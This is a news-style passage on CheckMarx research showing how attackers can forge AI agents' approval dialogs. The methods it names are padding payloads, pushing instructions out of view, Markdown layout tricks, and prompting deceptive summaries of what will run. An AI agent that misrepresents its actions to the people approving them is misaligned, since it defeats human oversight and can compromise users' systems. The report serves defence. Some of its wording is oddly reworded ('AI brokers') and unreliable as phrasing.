CheckMarx demonstrated that attackers can manipulate these dialogs by hiding or misrepresenting malicious directions, like padding payloads with benign-looking textual content, pushing harmful instructions out of the seen view, or crafting prompts that trigger the AI to generate deceptive summaries of what’s going to really execute.
In terminal-style interfaces, particularly, lengthy or formatted outputs make this sort of deception simple to overlook. Since many AI brokers function with elevated privileges, a single misled approval can translate immediately into code execution, operating OS instructions, file system entry, or downstream compromise, in accordance with CheckMarx findings.
Past padding or truncation, the researchers additionally described different dialog-forging methods that abuse how affirmation is rendered. By leveraging Markdown rendering and structure behaviors, attackers can visually separate benign textual content from hidden instructions or manipulate summaries so the human-visible description isn’t malicious.



